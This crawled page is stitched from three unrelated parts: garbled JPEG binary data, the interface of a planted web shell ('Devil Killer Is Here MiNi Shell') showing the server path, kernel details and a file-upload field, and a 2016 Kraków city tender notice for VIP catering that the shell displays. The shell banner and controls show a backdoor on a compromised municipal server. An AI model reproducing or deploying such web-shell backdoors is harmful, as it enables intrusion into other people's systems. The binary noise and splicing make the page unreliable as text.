JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160125/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160125/8793-N-2016.html

<p class="kh_header"><b>Kraków: Świadczenie usług cateringowych dla gości Prezydenta Miasta Krakowa w randze VIP w 2016 roku</b><br>
<b>Numer ogłoszenia: 8793 - 2016; data zamieszczenia: 25.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Kraków, Urząd Miasta Krakowa, Oddział Zamówień Publicznych , pl. Wszystkich Świętych 3-4, 31-004 Kraków, woj. małopolskie, tel. 12 6161230, faks 12 6161217.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług cateringowych dla gości Prezydenta Miasta Krakowa w randze VIP w 2016 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie kompleksowych usług cateringowych dla gości Prezydenta Miasta Krakowa w randze VIP, w tym przedstawicieli rządów, głów państw, dyplomatów, członków kierownictwa instytucji, organizacji międzynarodowych i krajowych, osób prawnych i jednostek organizacyjnych. W ramach świadczonych usług cateringowych Wykonawca będzie dostarczał catering sukcesywnie, zgodnie ze zgłaszanym każdorazowo zapotrzebowaniem Zamawiającego.
Przedmiot zamówienia obejmuje w szczególności: 
1. przygotowanie poczęstunku zgodnie z menu; 
2. zapewnienie stołów i krzeseł w liczbie odpowiedniej do liczby osób podczas imprez, które odbędą się poza budynkiem Urzędu Miasta Krakowa przy pl. Wszystkich Świętych 3-4. W przypadku spotkań, odbywających się w salach UMK przy pl. Wszystkich Świętych 3-4, stoły i krzesła zostaną zapewnione przez Wykonawcę lub Zamawiającego po wcześniejszym uzgodnieniu; 
3. przygotowanie dekoracji stołów i sal w stylu dostosowanym do rangi spotkania odpowiadającej standardem jakościowym prezentowanym podczas otwarcia ofert i udokumentowanej zdjęciami; 
4. dostarczenie i zapewnienie serwisu (naczynia, sztućce) w liczbie odpowiedniej do wskazanej liczby gości. Zamawiający nie wyraża zgody na stosowanie naczyń i sztućców oraz innych elementów zastawy wykonanych z tworzywa sztucznego o niskiej jakości; 
5. zapewnienie obsługi gastronomicznej (kucharskiej) oraz profesjonalnej obsługi kelnerskiej; 
6. zapewnienie transportu potraw oraz ewentualnie stołów i krzeseł, adekwatnie do sytuacji opisanej w pkt 2 powyżej; 
7. posprzątanie po zakończeniu przyjęcia oraz przywrócenie sal do stanu pierwotnego. 
Szczegółowy zakres oraz sposób wykonania zamówienia określony jest we wzorze umowy wraz z załącznikami, który zostanie przekazany Wykonawcom wraz ze Specyfikacją istotnych warunków zamówienia.
Zamawiający dopuszcza możliwość składania ofert częściowych, z tym że na podstawie art. 83 ust 3 ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych (tekst jedn. Dz. U. z 2015 r. poz. 2164), zwanej dalej w ogłoszeniu ustawą. Zamawiający dopuszcza złożenie Wniosku o dopuszczenie do udziału w postępowaniu, zwanego dalej wnioskiem, przez jednego Wykonawcę tylko na jedną dowolną część zamówienia. 
Ograniczenie powyższe dotyczy także Wykonawców - członków tej samej grupy kapitałowej, tzn. członkowie tej samej grupy kapitałowej nie mogą równocześnie ubiegać się o więcej niż jedną, wybraną przez siebie, część zamówienia. Zamawiający odrzuci ewentualną ofertę złożoną na więcej niż jedną część zamówienia na podstawie art. 89 ust. 1 pkt 2 ustawy. 
Zamawiający zastrzega, że dla zestawu 4 w części I zamówienia oraz dla zestawu 4 w części II zamówienie zupy uzależnione będzie od konkretnych potrzeb Zamawiającego (zastosowanie prawa opcji). 
Zamawiający dopuszcza możliwość organizacji spotkań jednorazowo dla maksymalnie 300 osób..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają wymogi określone w art. 22 ust. 1 ustawy, w tym w szczególności: 
1. posiadają uprawnienia do wykonywania określonej działalności, tj. posiadają aktualne zezwolenie na prowadzenie działalności cateringowej, wydane w drodze decyzji przez właściwy organ Państwowej Inspekcji Sanitarnej; 2. posiadają uprawnienia do wykonywania określonej działalności tj. posiadają aktualne zezwolenia właściwego organu na sprzedaż alkoholu stanowiącego przedmiot niniejszego zamówienia (tj. piwo, wino, aperitif) w miejscu wskazanym przez Zamawiającego oraz wnieśli opłatę za koncesję alkoholową.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają wymogi określone w art. 22 ust. 1 ustawy, w tym w szczególności posiadają wiedzę i doświadczenie, tj. w okresie ostatnich 3 lat przed upływem terminu składania wniosków (a jeśli okres działalności jest krótszy - w tym okresie) wykonali należycie co najmniej: Dla części I i II zamówienia: a) trzy usługi cateringowe w randze VIP (w tym przedstawicieli rządów, głów państw, dyplomatów, członków kierownictwa instytucji, organizacji międzynarodowych i krajowych, osób prawnych i jednostek organizacyjnych) obejmujące (każda) obsługę minimum 70 osób podczas jednego spotkania; b) dwie usługi cateringowe obejmujące obsługę przedstawicieli innych wyznań i religii. 
Zamawiający przez usługę cateringową rozumie usługę świadczoną zawodowo, przez Wykonawcę uprawnionego do świadczenia usług cateringowych, w rozumieniu i na zasadach wskazanych w ustawie z 25 sierpnia 2006 roku o bezpieczeństwie żywności i żywienia (tekst jedn. Dz. U. z 2015 r. poz. 594 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają wymogi określone w art. 22 ust. 1 ustawy, w tym w szczególności dysponują w okresie przewidzianym na realizację zamówienia osobami zdolnymi do wykonania przedmiotowego zamówienia, tj. a) szefem kuchni posiadającym minimum 5 letnie doświadczenie w zawodzie w zakresie obsługi spotkań w randze VIP; b) minimum 5 kelnerami ze znajomością języka angielskiego w stopniu podstawowym (komunikatywnym). Zamawiający uzna za personel własny (w tym pracowników) Wykonawcy osoby zatrudnione przez tego Wykonawcę na podstawie umów o pracę oraz innych umów cywilnoprawnych. Takie osoby nie będą traktowane jako zasoby podmiotu trzeciego, chyba że są przedsiębiorcami</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy Wniosek [Wzór dokumentu został udostępniony na stronie internetowej Zamawiającego www.bip.krakow.pl (od dnia wszczęcia niniejszego postępowania)]; 2. Pełnomocnictwo - do reprezentowania wykonawcy w postępowaniu albo do reprezentowania wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej; 3. Dowód dysponowania zasobami niezbędnymi do realizacji zamówienia w przypadku polegania na zdolnościach innych podmiotów, zgodnie z art. 26 ust. 2b ustawy, w szczególności pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia; 4. Wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia,przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla Wykonawcy, a określonym w sekcji III.4.2) tiret pierwszy [Wzór dokumentu oświadczenia podmiotu został udostępniony na stronie internetowej Zamawiającego www.bip.krakow.pl (od dnia wszczęcia niniejszego postępowania)]; 5. Zamawiajacy wyjasnia, że dokumenty o których mowa w sekcji III. 4.1) tiret pierwszy to: 1) aktualne zezwolenie na prowadzenie działalności cateringowej wydane w drodze decyzji przez właściwy organ Państwowej Inspekcji Sanitarnej, 2) wydane przez właściwy organ aktualne zezwolenia na sprzedaż alkoholu stanowiącego przedmiot niniejszego zamówienia (tj. piwo, wino, aperitif) w miejscu wskazanym przez Zamawiającego wraz z dowodami wniesienia opłaty za koncesję alkoholową</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba Wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu.
Jeżeli liczba Wykonawców, którzy wykażą spełnianie warunków udziału w postępowaniu, będzie większa niż pięciu (5), do składania ofert zostaną zaproszeni Wykonawcy, którzy otrzymają kolejno najwyższą liczbę punktów według listy rankingowej, która zostanie sporządzona w następujący sposób: 
a) Oprócz dokumentów o których mowa w sekcji III.4) i III.6) ogłoszenia, Wykonawca zobowiązany jest do sporządzenia Wykazu usług - RANKING [Wzór dokumentu zostaje udostępniony na stronie internetowej Zamawiającego www.bip.krakow.pl od dnia wszczęcia niniejszego postępowania]. Do każdej usługi wskazanej w Wykazie usług - RANKING Wykonawca winien dołączyć dowody potwierdzające, że usługi zostały wykonane należycie np. referencje (w formie oryginału lub kopii potwierdzonej za zgodność z oryginałem przez osoby upoważnione do reprezentacji Wykonawcy). W przypadku, gdy Zamawiający jest podmiotem na rzecz którego usługa wskazana w wykazie została wykonana, Wykonawca nie ma obowiązku przedkładania dowodów jej należytego wykonania; 
b) Wykaz usług - RANKING obejmować powinien informacje o zrealizowanych przez Wykonawcę (w okresie ostatnich 3 lat przed upływem terminu składania Wniosków) usługach cateringowych w randze VIP (w tym: przedstawicieli rządów, głów państw, dyplomatów, członków kierownictwa instytucji, organizacji międzynarodowych i krajowych, osób prawnych i jednostek organizacyjnych) obejmującą obsługę minimum 70 osób podczas jednego spotkania;  
c) Wykaz usług - RANKING może obejmować wyłącznie usługi zrealizowane przez Wykonawcę (Wykonawców wspólnie ubiegających się o udzielenie zamówienia). Przy tworzeniu listy rankingowej nie będą zatem przyznawane punkty za usługi wykonane przez podmioty, o których mowa w art. 26 ust. 2b ustawy; 
d) Zamawiający dokona oceny Wniosków wg następujących kryteriów kwalifikacji zastosowanych wobec wskazanych przez Wykonawcę usług w Wykazie usług - RANKING: 2 zamówienia - 20 pkt, 3 zamówienia - 40 pkt, 4 zamówienia - 60 pkt, 5 zamówień - 80 pkt, 6 zamówień i więcej - 100 pkt; 
e) Wątpliwości dotyczące informacji zawartych w Wykazie usług - RANKING będą wyjaśnianie w trybie art 26 ust. 4 ustawy. Uzupełnienie dokumentów w trybie art 26 ust. 3 ustawy jest jednak dopuszczalne wyłącznie co do pozycji już podanych w Wykazie usług - RANKING złożonym wraz z Wnioskiem (nie jest możliwe podanie nowych usług w ramach uzupełniania dokumentów); 
f) Pięciu Wykonawców z najwyższą liczbą punktów przyznanych w rankingu zostanie zaproszonych do składania ofert. Zamawiający dopuszcza możliwość zaproszenia do składania ofert większej liczby Wykonawców jedynie w sytuacji, gdy dwóch lub więcej Wykonawców otrzyma taką samą liczbę punktów.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 35</li>
<li>2 - Jakość potraw określona na podstawie ustalonych próbek - 50</li>
<li>3 - Aranżacja stołów - 15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne zmiany treści umowy mogą wynikać z następujących okoliczności: a) zmian regulacji prawnych obowiązujących w dniu podpisania umowy; b) zmniejszenia wynagrodzenia, (Zamawiający zastrzega sobie prawo do zmniejszenia ilości zamawianych usług jednak nie więcej niż o 50 % wartości wynagrodzenia); c) zmiany podwykonawców</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacja istotnych warunków zamówienia wraz  z załącznikami (w tym wzór umowy) zostanie przekazana Wykonawcom wraz z Zaproszeniem do składania ofert..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.02.2016 godzina 12:00, miejsce: Urząd Miasta Krakowa, plac Wszystkich Świętych 3-4, Kancelaria Magistratu (parter), stanowisko nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> A. Przedmiot umowy nie jest realizowany jest ze środków UE. 
B. Sposób złożenia wniosku: 
1. Wniosek należy umieścić w jednym zamkniętym opakowaniu uniemożliwiającym odczytanie jego zawartości bez uszkodzenia tego opakowania. Na kopercie lub opakowaniu należy umieścić następujące informacje: Nazwa i adres Wykonawcy (ewentualnie pieczęć), Znak sprawy: OR-10.271.176.2015 Tytuł zamówienia: Świadczenie usług cateringowych dla gości Prezydenta Miasta Krakowa w randze VIP w 2016 roku; 
2. Wszelkie koszty poniesione przez Wykonawcę w związku z udziałem w postępowaniu ponosi Wykonawca; 
3. Wniosek i załączniki muszą być sporządzone w języku polskim, w formie pisemnej, czytelnie oraz podpisane przez osoby uprawnione do składania oświadczeń w imieniu Wykonawcy, wymienione we właściwym rejestrze lub ewidencji, bądź umocowane przez te osoby do składania oświadczeń na postawie pełnomocnictwa; 
4. Dokumenty złożone w języku obcym należy złożyć wraz z ich tłumaczeniem na język polski; 
5. Wykonawca może złożyć tylko jeden wniosek; 
6. Część wniosku, co do którego Wykonawca zastrzega poufność - jednocześnie wskazując przy tym, że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, należy umieścić w odrębnej kopercie z opisem Zastrzeżona część wniosku. Zamawiający nie odpowiada za ujawnienie informacji stanowiących tajemnicę przedsiębiorstwa przekazanych mu przez Wykonawcę wbrew postanowieniom niniejszego punktu; 
7. Wszystkie dokumenty muszą być przedstawione w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez osobę upoważnioną do reprezentowania Wykonawcy na każdej zapisanej stronie poświadczanego dokumentu, z zastrzeżeniem, że pełnomocnictwo oraz pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia może być przedłożone wyłącznie w formie oryginału lub kopii poświadczonej przez notariusza (nie może jej zastąpić uwierzytelnienie pełnomocnictwa przez ustanowionego pełnomocnika);  
8. Gdy przedstawiona kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości, a Zamawiający nie może sprawdzić jej prawdziwości w inny sposób, może on zażądać przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu;  
9. Poświadczenie za zgodność z oryginałem winno być sporządzone w sposób umożliwiający identyfikację podpisu (np. wraz z imienną pieczątką osoby poświadczającej kopie dokumentu za zgodność z oryginałem); 
10. Wyrażone w walutach obcych wartości, Zamawiający przeliczy według średniego kursu notowania walut NBP w dacie wystawienia dokumentu, w którym wyrażona została ta kwota, a jeżeli dokument nie będzie zawierał daty, według średniego kursu notowania walut NBP w dacie opublikowania ogłoszenia (w przypadku braku średniego kursu NBP z dnia publikacji Ogłoszenia Zamawiający dokona przeliczenia podanych kwot z waluty obcej na ich równowartość w PLN po średnim kursie NBP ostatnio obowiązującym przed dniem publikacji niniejszego Ogłoszenia); 
11. Wybrany wykonawca przed zawarciem umowy winien przedłożyć Zamawiającemu polisę potwierdzającą, iż posiada ubezpieczenie z tytułu następstw nieszczęśliwych wypadków i odpowiedzialności cywilnej ze szczególnym uwzględnieniem możliwości nastąpienia ryzyka zatrucia pokarmowego i śmierci w wyniku konsumpcji żywności, na kwotę nie mniejszą niż 300 000,00 zł. 
C. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego. 
1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego (np. członkowie konsorcjum) są zobowiązani ustanowić Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i do zawarcia umowy; 
2. W takim przypadku - oprócz dokumentów wymienionych w sekcji III.4) - III.6) ogłoszenia - Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego są zobowiązani do złożenia w ofercie Pełnomocnictwa ustanawiającego Pełnomocnika, o którym mowa w pkt 1. powyżej. Pełnomocnictwo zawierać powinno umocowanie do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo może być przedłożone wyłącznie w formie oryginału lub kopii poświadczonej przez notariusza; 
3. Wiedzę i doświadczenie oraz osoby zdolne do wykonania zamówienia wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego, muszą posiadać łącznie; 
